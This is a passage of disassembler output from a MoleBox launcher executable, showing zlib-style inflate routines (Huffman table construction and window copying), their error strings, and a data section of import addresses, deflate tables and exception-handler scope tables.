loc_4DD4AE: ; CODE XREF: sub_4DD425+7E�j
cmp esi, ecx
mov [ebp+var_4], ecx
jnb short loc_4DD4B8
mov [ebp+arg_18], ecx
loc_4DD4B8: ; CODE XREF: sub_4DD425+8E�j
push 0Fh
lea esi, [ebp+var_38]
pop eax
loc_4DD4BE: ; CODE XREF: sub_4DD425+A3�j
cmp [esi], edx
jnz short loc_4DD4CA
dec eax
sub esi, 4
cmp eax, edx
jnz short loc_4DD4BE
loc_4DD4CA: ; CODE XREF: sub_4DD425+9B�j
cmp [ebp+arg_18], eax
mov [ebp+var_18], eax
jbe short loc_4DD4D5
mov [ebp+arg_18], eax
loc_4DD4D5: ; CODE XREF: sub_4DD425+AB�j
mov esi, [ebp+arg_18]
shl ebx, cl
cmp ecx, eax
mov [edi], esi
jnb short loc_4DD4F6
lea esi, [ebp+ecx*4+var_74]
loc_4DD4E4: ; CODE XREF: sub_4DD425+CF�j
sub ebx, [esi]
js loc_4DD61C
inc ecx
add esi, 4
shl ebx, 1
cmp ecx, eax
jb short loc_4DD4E4
loc_4DD4F6: ; CODE XREF: sub_4DD425+B9�j
mov esi, eax
shl esi, 2
mov edi, [ebp+esi+var_74]
lea ecx, [ebp+esi+var_74]
sub ebx, edi
mov [ebp+var_30], ebx
js loc_4DD61C
add edi, ebx
mov [ebp+var_B0], edx
mov [ecx], edi
xor ecx, ecx
dec eax
jz short loc_4DD530
xor edi, edi
loc_4DD51F: ; CODE XREF: sub_4DD425+109�j
add ecx, [ebp+edi+var_70]
add edi, 4
dec eax
mov [ebp+edi+var_B0], ecx
jnz short loc_4DD51F
loc_4DD530: ; CODE XREF: sub_4DD425+F6�j
mov ebx, [ebp+arg_0]
xor edi, edi
loc_4DD535: ; CODE XREF: sub_4DD425+136�j
mov eax, [ebx]
add ebx, 4
cmp eax, edx
jz short loc_4DD557
mov ecx, [ebp+eax*4+var_B4]
mov edx, [ebp+arg_24]
lea eax, [ebp+eax*4+var_B4]
mov [edx+ecx*4], edi
inc ecx
mov [eax], ecx
xor edx, edx
loc_4DD557: ; CODE XREF: sub_4DD425+117�j
inc edi
cmp edi, [ebp+arg_4]
jb short loc_4DD535
mov eax, [ebp+esi+var_B4]
mov ebx, [ebp+arg_18]
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+arg_4], eax
mov eax, [ebp+arg_24]
mov [ebp+var_C], edx
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
neg ebx
cmp eax, [ebp+var_18]
mov [ebp+var_B4], edx
mov [ebp+var_F0], edx
mov [ebp+var_1C], edx
mov [ebp+arg_0], edx
jg loc_4DD791
mov edi, [ebp+var_24]
lea ecx, [eax-1]
lea eax, [ebp+eax*4+var_74]
mov [ebp+var_2C], ecx
mov [ebp+var_20], eax
loc_4DD5A7: ; CODE XREF: sub_4DD425+366�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov ecx, eax
dec eax
test ecx, ecx
mov [ebp+var_14], eax
jz loc_4DD77B
loc_4DD5BA: ; CODE XREF: sub_4DD425+350�j
mov eax, [ebp+arg_18]
add eax, ebx
cmp [ebp+var_4], eax
jle loc_4DD6A6
loc_4DD5C8: ; CODE XREF: sub_4DD425+279�j
mov ecx, [ebp+arg_18]
inc [ebp+var_8]
add eax, ecx
add ebx, ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_18]
sub eax, ebx
cmp eax, ecx
mov [ebp+arg_0], eax
jbe short loc_4DD5E4
mov [ebp+arg_0], ecx
loc_4DD5E4: ; CODE XREF: sub_4DD425+1BA�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_14]
push 1
sub ecx, ebx
pop eax
shl eax, cl
inc edx
cmp eax, edx
jbe short loc_4DD623
mov esi, [ebp+var_20]
or edx, 0FFFFFFFFh
sub edx, [ebp+var_14]
add eax, edx
cmp ecx, [ebp+arg_0]
jnb short loc_4DD623
loc_4DD606: ; CODE XREF: sub_4DD425+1F5�j
inc ecx
cmp ecx, [ebp+arg_0]
jnb short loc_4DD623
mov edx, [esi+4]
add esi, 4
shl eax, 1
cmp eax, edx
jbe short loc_4DD623
sub eax, edx
jmp short loc_4DD606
; ---------------------------------------------------------------------------
loc_4DD61C: ; CODE XREF: sub_4DD425+C1�j
; sub_4DD425+E3�j ...
push 0FFFFFFFDh
jmp loc_4DD7A6
; ---------------------------------------------------------------------------
loc_4DD623: ; CODE XREF: sub_4DD425+1CF�j
; sub_4DD425+1DF�j ...
mov eax, [ebp+arg_20]
push 1
pop edx
mov eax, [eax]
shl edx, cl
mov [ebp+arg_0], edx
lea esi, [eax+edx]
cmp esi, 5A0h
ja short loc_4DD61C
mov edx, [ebp+arg_1C]
lea eax, [edx+eax*8]
mov edx, [ebp+var_8]
mov [ebp+var_1C], eax
lea edx, [ebp+edx*4+var_F0]
mov [edx], eax
mov eax, [ebp+arg_20]
mov [eax], esi
mov eax, [ebp+var_8]
test eax, eax
jz short loc_4DD690
mov esi, [ebp+var_C]
mov edi, [ebp+var_1C]
mov [ebp+eax*4+var_B4], esi
mov eax, [ebp+arg_18]
mov byte ptr [ebp+var_28], cl
mov ecx, ebx
mov byte ptr [ebp+var_28+1], al
sub ecx, eax
mov eax, esi
shr eax, cl
mov ecx, [edx-4]
mov edx, [ebp+var_28]
sub edi, ecx
sar edi, 3
sub edi, eax
mov [ecx+eax*8], edx
mov [ecx+eax*8+4], edi
jmp short loc_4DD698
; ---------------------------------------------------------------------------
loc_4DD690: ; CODE XREF: sub_4DD425+235�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_4DD698: ; CODE XREF: sub_4DD425+269�j
mov eax, [ebp+var_34]
cmp [ebp+var_4], eax
jg loc_4DD5C8
xor edx, edx
loc_4DD6A6: ; CODE XREF: sub_4DD425+19D�j
mov al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_4]
sub al, bl
mov byte ptr [ebp+var_28+1], al
mov eax, [ebp+arg_24]
lea ecx, [eax+ecx*4]
mov eax, [ebp+var_10]
cmp eax, ecx
jb short loc_4DD6C4
mov byte ptr [ebp+var_28], 0C0h
jmp short loc_4DD6FB
; ---------------------------------------------------------------------------
loc_4DD6C4: ; CODE XREF: sub_4DD425+297�j
mov eax, [eax]
cmp eax, [ebp+arg_8]
jnb short loc_4DD6DF
cmp eax, 100h
mov edi, eax
sbb cl, cl
and cl, 0A0h
add cl, 60h
mov byte ptr [ebp+var_28], cl
jmp short loc_4DD6F7
; ---------------------------------------------------------------------------
loc_4DD6DF: ; CODE XREF: sub_4DD425+2A4�j
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
shl eax, 2
mov cl, [eax+ecx]
add cl, 50h
mov byte ptr [ebp+var_28], cl
mov ecx, [ebp+arg_C]
mov edi, [eax+ecx]
loc_4DD6F7: ; CODE XREF: sub_4DD425+2B8�j
add [ebp+var_10], 4
loc_4DD6FB: ; CODE XREF: sub_4DD425+29D�j
mov ecx, [ebp+var_4]
mov eax, [ebp+var_C]
push 1
sub ecx, ebx
pop esi
shl esi, cl
mov ecx, ebx
shr eax, cl
cmp eax, [ebp+arg_0]
jnb short loc_4DD72F
mov ecx, [ebp+var_1C]
lea ecx, [ecx+eax*8]
loc_4DD717: ; CODE XREF: sub_4DD425+306�j
mov edx, [ebp+var_28]
add eax, esi
mov [ecx], edx
mov edx, esi
shl edx, 3
mov [ecx+4], edi
add ecx, edx
cmp eax, [ebp+arg_0]
jb short loc_4DD717
xor edx, edx
loc_4DD72F: ; CODE XREF: sub_4DD425+2EA�j
mov ecx, [ebp+var_2C]
push 1
pop eax
shl eax, cl
mov ecx, [ebp+var_C]
loc_4DD73A: ; CODE XREF: sub_4DD425+31D�j
test eax, ecx
jz short loc_4DD744
xor ecx, eax
shr eax, 1
jmp short loc_4DD73A
; ---------------------------------------------------------------------------
loc_4DD744: ; CODE XREF: sub_4DD425+317�j
xor ecx, eax
mov eax, [ebp+var_8]
mov [ebp+var_C], ecx
lea eax, [ebp+eax*4+var_B4]
loc_4DD753: ; CODE XREF: sub_4DD425+346�j
push 1
mov ecx, ebx
pop esi
shl esi, cl
dec esi
and esi, [ebp+var_C]
cmp esi, [eax]
jz short loc_4DD76D
dec [ebp+var_8]
sub eax, 4
sub ebx, [ebp+arg_18]
jmp short loc_4DD753
; ---------------------------------------------------------------------------
loc_4DD76D: ; CODE XREF: sub_4DD425+33B�j
mov eax, [ebp+var_14]
dec [ebp+var_14]
test eax, eax
jnz loc_4DD5BA
loc_4DD77B: ; CODE XREF: sub_4DD425+18F�j
inc [ebp+var_4]
add [ebp+var_20], 4
mov eax, [ebp+var_4]
inc [ebp+var_2C]
cmp eax, [ebp+var_18]
jle loc_4DD5A7
loc_4DD791: ; CODE XREF: sub_4DD425+16C�j
cmp [ebp+var_30], edx
jz loc_4DD48A
cmp [ebp+var_18], 1
jz loc_4DD48A
push 0FFFFFFFBh
loc_4DD7A6: ; CODE XREF: sub_4DD425+1F9�j
pop eax
jmp loc_4DD48C
sub_4DD425 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DD7AC proc near ; CODE XREF: sub_4DBC4B+56C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_20]
push 4
push 120h
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebp+arg_20], eax
test eax, eax
jnz short loc_4DD7D7
push 0FFFFFFFCh
pop eax
jmp loc_4DD8AC
; ---------------------------------------------------------------------------
loc_4DD7D7: ; CODE XREF: sub_4DD7AC+21�j
push ebx
push edi
push eax
lea eax, [ebp+var_4]
push eax
mov ebx, [ebp+arg_0]
push [ebp+arg_1C]
mov edi, 101h
push [ebp+arg_C]
push [ebp+arg_14]
push offset dword_4DE12C
push offset dword_4DE0B0
push edi
push ebx
push [ebp+arg_8]
call sub_4DD425
add esp, 28h
test eax, eax
jnz short loc_4DD87E
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0
jz short loc_4DD891
push [ebp+arg_20]
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+arg_8]
push [ebp+arg_1C]
lea eax, [eax+ebx*4]
push [ebp+arg_10]
push [ebp+arg_18]
push offset dword_4DE220
push offset dword_4DE1A8
push 0
push [ebp+arg_4]
push eax
call sub_4DD425
add esp, 28h
test eax, eax
jnz short loc_4DD854
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jnz short loc_4DD850
cmp ebx, edi
ja short loc_4DD875
loc_4DD850: ; CODE XREF: sub_4DD7AC+9E�j
xor edi, edi
jmp short loc_4DD89D
; ---------------------------------------------------------------------------
loc_4DD854: ; CODE XREF: sub_4DD7AC+96�j
cmp eax, 0FFFFFFFDh
jnz short loc_4DD862
mov dword ptr [esi+18h], offset aOversubscrib_0 ; "oversubscribed distance tree"
jmp short loc_4DD89B
; ---------------------------------------------------------------------------
loc_4DD862: ; CODE XREF: sub_4DD7AC+AB�j
cmp eax, 0FFFFFFFBh
jnz short loc_4DD870
mov dword ptr [esi+18h], offset aIncompleteDist ; "incomplete distance tree"
jmp short loc_4DD898
; ---------------------------------------------------------------------------
loc_4DD870: ; CODE XREF: sub_4DD7AC+B9�j
cmp eax, 0FFFFFFFCh
jz short loc_4DD89B
loc_4DD875: ; CODE XREF: sub_4DD7AC+A2�j
mov dword ptr [esi+18h], offset aEmptyDistanceT ; "empty distance tree with lengths"
jmp short loc_4DD898
; ---------------------------------------------------------------------------
loc_4DD87E: ; CODE XREF: sub_4DD7AC+5C�j
cmp eax, 0FFFFFFFDh
jnz short loc_4DD88C
mov dword ptr [esi+18h], offset aOversubscrib_1 ; "oversubscribed literal/length tree"
jmp short loc_4DD89B
; ---------------------------------------------------------------------------
loc_4DD88C: ; CODE XREF: sub_4DD7AC+D5�j
cmp eax, 0FFFFFFFCh
jz short loc_4DD89B
loc_4DD891: ; CODE XREF: sub_4DD7AC+64�j
mov dword ptr [esi+18h], offset aIncompleteLite ; "incomplete literal/length tree"
loc_4DD898: ; CODE XREF: sub_4DD7AC+C2�j
; sub_4DD7AC+D0�j
push 0FFFFFFFDh
pop eax
loc_4DD89B: ; CODE XREF: sub_4DD7AC+B4�j
; sub_4DD7AC+C7�j ...
mov edi, eax
loc_4DD89D: ; CODE XREF: sub_4DD7AC+A6�j
push [ebp+arg_20]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov eax, edi
pop ecx
pop edi
pop ebx
loc_4DD8AC: ; CODE XREF: sub_4DD7AC+26�j
pop esi
leave
retn
sub_4DD7AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DD8AF proc near ; CODE XREF: sub_4DBC4B+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, ds:dword_4DF120
mov [eax], ecx
mov eax, [ebp+arg_4]
mov ecx, ds:dword_4DF124
mov [eax], ecx
mov eax, [ebp+arg_8]
mov dword ptr [eax], offset dword_4DF128
mov eax, [ebp+arg_C]
mov dword ptr [eax], offset dword_4E0128
xor eax, eax
pop ebp
retn
sub_4DD8AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DD8DE proc near ; CODE XREF: sub_4DBC4B+1F0�p
; sub_4DBC4B+846�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov edx, [ebx+30h]
push edi
mov edi, [ebx+34h]
mov eax, [esi+0Ch]
cmp edx, edi
mov [ebp+var_8], eax
mov [ebp+arg_0], edx
jbe short loc_4DD902
mov edi, [ebx+2Ch]
loc_4DD902: ; CODE XREF: sub_4DD8DE+1F�j
mov eax, [esi+10h]
sub edi, edx
cmp edi, eax
mov [ebp+var_4], edi
jbe short loc_4DD913
mov [ebp+var_4], eax
mov edi, eax
loc_4DD913: ; CODE XREF: sub_4DD8DE+2E�j
test edi, edi
jz short loc_4DD921
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_4DD921
and [ebp+arg_8], 0
loc_4DD921: ; CODE XREF: sub_4DD8DE+37�j
; sub_4DD8DE+3D�j
add [esi+14h], edi
sub eax, edi
mov [esi+10h], eax
mov eax, [ebx+38h]
test eax, eax
jz short loc_4DD943
push edi
push edx
push dword ptr [ebx+3Ch]
call eax
mov edx, [ebp+arg_0]
mov [ebx+3Ch], eax
add esp, 0Ch
mov [esi+30h], eax
loc_4DD943: ; CODE XREF: sub_4DD8DE+50�j
mov ecx, edi
mov edi, [ebp+var_8]
mov eax, ecx
mov esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_4]
add [ebp+var_8], eax
add [ebp+arg_0], eax
and ecx, 3
rep movsb
mov eax, [ebx+2Ch]
cmp [ebp+arg_0], eax
jnz short loc_4DD9DC
mov edx, [ebx+28h]
cmp [ebx+34h], eax
mov [ebp+arg_0], edx
jnz short loc_4DD977
mov [ebx+34h], edx
loc_4DD977: ; CODE XREF: sub_4DD8DE+94�j
mov esi, [ebp+arg_4]
mov edi, [ebx+34h]
sub edi, edx
mov eax, [esi+10h]
mov [ebp+var_4], edi
cmp edi, eax
jbe short loc_4DD98E
mov [ebp+var_4], eax
mov edi, eax
loc_4DD98E: ; CODE XREF: sub_4DD8DE+A9�j
test edi, edi
jz short loc_4DD99C
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_4DD99C
and [ebp+arg_8], 0
loc_4DD99C: ; CODE XREF: sub_4DD8DE+B2�j
; sub_4DD8DE+B8�j
add [esi+14h], edi
sub eax, edi
mov [esi+10h], eax
mov eax, [ebx+38h]
test eax, eax
jz short loc_4DD9BE
push edi
push edx
push dword ptr [ebx+3Ch]
call eax
mov edx, [ebp+arg_0]
mov [ebx+3Ch], eax
add esp, 0Ch
mov [esi+30h], eax
loc_4DD9BE: ; CODE XREF: sub_4DD8DE+CB�j
mov ecx, edi
mov edi, [ebp+var_8]
mov eax, ecx
mov esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_4]
add [ebp+var_8], eax
and ecx, 3
add [ebp+arg_0], eax
rep movsb
loc_4DD9DC: ; CODE XREF: sub_4DD8DE+89�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
pop edi
pop esi
mov [eax+0Ch], ecx
mov eax, [ebp+arg_0]
mov [ebx+30h], eax
mov eax, [ebp+arg_8]
pop ebx
leave
retn
sub_4DD8DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DD9F3 proc near ; CODE XREF: sub_4D0C5C+32C�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
mov eax, [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_38], eax
mov eax, [ebp+arg_C]
and [ebp+var_18], 0
mov [ebp+var_34], eax
mov eax, [ebp+arg_0]
and [ebp+var_14], 0
mov [ebp+var_2C], eax
mov eax, [esi]
push edi
mov [ebp+var_28], eax
push 38h
lea eax, [ebp+var_38]
push offset byte_4DF0A8
push eax
call sub_4DD02B
add esp, 0Ch
test eax, eax
jnz short loc_4DDA6E
lea eax, [ebp+var_38]
push 4
push eax
call sub_4DD043
mov edi, eax
pop ecx
cmp edi, 1
pop ecx
jz short loc_4DDA5F
lea eax, [ebp+var_38]
push eax
call sub_4DCF00
test edi, edi
pop ecx
jnz short loc_4DDA5B
push 0FFFFFFFBh
pop eax
jmp short loc_4DDA6E
; ---------------------------------------------------------------------------
loc_4DDA5B: ; CODE XREF: sub_4DD9F3+61�j
mov eax, edi
jmp short loc_4DDA6E
; ---------------------------------------------------------------------------
loc_4DDA5F: ; CODE XREF: sub_4DD9F3+53�j
mov eax, [ebp+var_24]
mov [esi], eax
lea eax, [ebp+var_38]
push eax
call sub_4DCF00
pop ecx
loc_4DDA6E: ; CODE XREF: sub_4DD9F3+3F�j
; sub_4DD9F3+66�j ...
pop edi
pop esi
leave
retn
sub_4DD9F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DDA72 proc near ; DATA XREF: sub_4DCF41+41�o
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
imul eax, [ebp+arg_8]
push eax
call sub_4D835A
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_4DDA72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DDA8C proc near ; DATA XREF: sub_4DCF41+50�o
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
call sub_4D83DD
pop ecx
leave
retn
sub_4DDA8C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DDAB0 proc near ; CODE XREF: sub_4CDB8D+5�j
; _4:004CDB97�j
push ebp
mov ebp, esp
push offset aApiNopefunc ; ":API:NopeFunc"
call sub_4D84F7
pop ebp
retn
sub_4DDAB0 endp ; sp-analysis failed
_4 ends
; Section 6. (virtual address 000DE000)
; Virtual size : 00000D76 ( 3446.)
; Section size in file : 00000D76 ( 3446.)
; Offset to raw data for section: 000DE000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_5 segment para public 'CODE' use32
assume cs:_5
;org 4DE000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_4DE000 dd 77E79908h ; DATA XREF: sub_4CD2E0+3AD�r
; sub_4CD2E0+3B8�r ...
dword_4DE004 dd 77E7A5FDh ; DATA XREF: sub_4CD2E0+1D9�r
; sub_4CD2E0+1ED�r ...
dword_4DE008 dd 77E79A45h ; DATA XREF: sub_4CD2E0+1A5�r
; sub_4CD2E0+398�r ...
dword_4DE00C dd 77E6D706h ; DATA XREF: sub_4CD2E0+12B�r
; sub_4CD2E0+173�r ...
dword_4DE010 dd 77E79881h ; DATA XREF: sub_4CD2E0+1A�r
; sub_4CD2E0+108�r ...
dword_4DE014 dd 77E79F93h ; DATA XREF: sub_4CD2E0+A�r
; sub_4CD2E0+1B0�r ...
dword_4DE018 dd 77F7E300h ; DATA XREF: sub_4CC060+4�r
; sub_4CF12B+15�r ...
dword_4DE01C dd 77F7E21Fh ; DATA XREF: sub_4CC000+2C�r
; sub_4CF036+65�r ...
dword_4DE020 dd 77E6C10Bh ; DATA XREF: sub_4D2DD0+1A1�r
dword_4DE024 dd 77E6E154h ; DATA XREF: sub_4D71C3+114�r
dword_4DE028 dd 77E61A90h ; DATA XREF: sub_4D7494+3A�r
; sub_4D7494+7C�r ...
dword_4DE02C dd 77E62050h ; DATA XREF: sub_4DADDE+3F�r
dword_4DE030 dd 77E641EBh ; DATA XREF: sub_4CCDBF+59�r
; sub_4CCDBF+8D�r
dword_4DE034 dd 77E781F9h ; DATA XREF: sub_4CCA80+42�r
; sub_4CCA80+14D�r ...
dword_4DE038 dd 77E77405h ; DATA XREF: sub_4CCA80+5E�r
; sub_4CCA80+A7�r
dword_4DE03C dd 77F6183Eh ; DATA XREF: sub_4CCF68�r
dword_4DE040 dd 77E79924h ; DATA XREF: sub_4CCA80+20D�r
dword_4DE044 dd 77E77CCEh ; DATA XREF: sub_4CCA80+DF�r
; sub_4CCA80+137�r ...
dword_4DE048 dd 77E7C866h ; DATA XREF: sub_4CCDBF+3F�r
; sub_4CCDBF+12D�r
align 10h
dword_4DE050 dd 77D46F5Bh ; DATA XREF: sub_4CC15E+AD�r
dword_4DE054 dd 77D4B1B0h ; DATA XREF: sub_4CC271+B8�r
align 10h
dword_4DE060 dd 10h ; DATA XREF: sub_4DBC4B+36F�r
; sub_4DBC4B+3A0�r
dd 11h, 12h, 0
dd 8, 7, 9, 6, 0Ah, 5, 0Bh, 4, 0Ch, 3, 0Dh, 2, 0Eh, 1
dd 0Fh, 0FFFF0000h
dword_4DE0B0 dd 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Dh, 0Fh, 11h, 13h, 17h
; DATA XREF: sub_4DD7AC+48�o
dd 1Bh, 1Fh, 23h, 2Bh, 33h, 3Bh, 43h, 53h, 63h, 73h, 83h
dd 0A3h, 0C3h, 0E3h, 102h, 2 dup(0)
dword_4DE12C dd 8 dup(0) ; DATA XREF: sub_4DD7AC+43�o
dd 4 dup(1), 4 dup(2), 4 dup(3), 4 dup(4), 4 dup(5), 0
dd 2 dup(70h)
dword_4DE1A8 dd 1, 2, 3, 4, 5, 7, 9, 0Dh, 11h, 19h, 21h, 31h, 41h, 61h
; DATA XREF: sub_4DD7AC+81�o
dd 81h, 0C1h, 101h, 181h, 201h, 301h, 401h, 601h, 801h
dd 0C01h, 1001h, 1801h, 2001h, 3001h, 4001h, 6001h
dword_4DE220 dd 4 dup(0) ; DATA XREF: sub_4DD7AC+7C�o
dd 2 dup(1), 2 dup(2), 2 dup(3), 2 dup(4), 2 dup(5), 2 dup(6)
dd 2 dup(7), 2 dup(8), 2 dup(9), 2 dup(0Ah), 2 dup(0Bh)
dd 2 dup(0Ch), 2 dup(0Dh)
dword_4DE298 dd 0FFFFFFFFh, 0 ; DATA XREF: _4:004CEBB5�o
dd offset sub_4CEDE4
align 8
dd offset loc_4CEDB2+2
dd offset loc_4CEDBA
dword_4DE2B0 dd 0FFFFFFFFh, 0 ; DATA XREF: _4:004CEE35�o
dd offset sub_4CF00C
align 10h
dword_4DE2C0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4CF036+5�o
dd offset sub_4CF12B
align 10h
dword_4DE2D0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4CF252+5�o
dd offset sub_4CF61F
align 10h
dword_4DE2E0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4CC000+5�o
dd offset sub_4CC05D
align 10h
dword_4DE2F0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4CF6DE+5�o
; ---------------------------------------------------------------------------
jmp near ptr dword_4E2FF4
; ---------------------------------------------------------------------------
align 10h
dword_4DE300 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4CF818+5�o
dd offset sub_4CF91D
align 10h
dword_4DE310 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4CF94C+5�o
dd offset sub_4CFCA7
dd 2 dup(0)
dd offset sub_4CFA93
dword_4DE328 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4CFD24+5�o
dd offset loc_4CFE9E
align 8
dword_4DE338 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4CFECD+5�o
dd offset loc_4CFF90
align 8
dword_4DE348 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4CFFBF+5�o
dd offset loc_4D01D1
align 8
dword_4DE358 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D0216+5�o
dd offset sub_4D0317
align 8
dword_4DE368 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D0421+5�o
dd offset sub_4D0643
align 8
dword_4DE378 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D0672+5�o
dd offset sub_4D0712
align 8
dword_4DE388 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D0741+5�o
dd offset loc_4D0829
align 8
dword_4DE398 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D0858+5�o
dd offset sub_4D0921
align 8
dword_4DE3A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D0950+5�o
dd offset sub_4D09E1
align 8
dword_4DE3B8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D0C5C+5�o
dd offset sub_4D0E9D
align 8
dword_4DE3C8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D1177+5�o
dd offset sub_4D1441
align 8
dword_4DE3D8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D153F+5�o
dd offset sub_4D18B0
align 8
dword_4DE3E8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D19D2+5�o
dd offset sub_4D1A8F
align 8
dword_4DE3F8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D1CC4+5�o
dd offset sub_4D2194
align 8
dword_4DE408 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D2DD0+5�o
dd offset sub_4D35A2
align 8
dd offset loc_4D3354
dd offset loc_4D3385
dword_4DE420 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D3610+5�o
dd offset sub_4D4427
align 10h
dword_4DE430 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D4490+5�o
dd offset sub_4D469C
align 10h
dword_4DE440 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D46D0+5�o
dd offset sub_4D4791
align 10h
dword_4DE450 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D47BF+5�o
dd offset sub_4D487F
align 10h
dword_4DE460 dd 0FFFFFFFFh, 4D5388h, 4D539Bh, 0 ; DATA XREF: sub_4D50D0+5�o
dd offset loc_4D5250
dd offset loc_4D5264
dword_4DE478 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D5456+5�o
dd offset loc_4D56BB
align 8
dword_4DE488 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D5A41+5�o
dd offset sub_4D5AB3
align 8
dword_4DE498 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D5BD7+5�o
dd offset nullsub_1
align 8
dd offset loc_4D5F3B
dd offset loc_4D5F44
dd 2 dup(0)
dd offset sub_4D5FCD
align 10h
dword_4DE4C0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D61E1+5�o
dd offset sub_4D7085
align 10h
dd offset sub_4D6B7F
dd offset sub_4D6B88
dd 1, 0
dd offset sub_4D6B0E
align 8
dword_4DE4E8 dd 0FFFFFFFFh, 4D72E3h, 4D731Dh ; DATA XREF: sub_4D71C3+5�o
off_4DE4F4 dd offset aMoleboxLaunche ; DATA XREF: sub_4D8401+13�r
; sub_4D8C27+252�r
; "MoleBox launcher fatal error"
off_4DE4F8 dd offset aAssertionFai_0 ; DATA XREF: sub_4CF036+B6�r
; sub_4CF94C+BF�r ...
; "ASSERTION failed"
off_4DE4FC dd offset aStripped ; DATA XREF: sub_4CF036+BE�r
; sub_4CF94C+C7�r ...
; "<stripped>"
dword_4DE500 dd 0FFFFFFFFh, 4D8472h, 4D8476h, 0 ; DATA XREF: sub_4D8436+5�o
dword_4DE510 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D8538+5�o
dd offset loc_4D86FC
align 10h
dword_4DE520 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D8726+5�o
dd offset sub_4D87AB
align 10h
dword_4DE530 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D87CA+5�o
dd offset sub_4D8864
align 10h
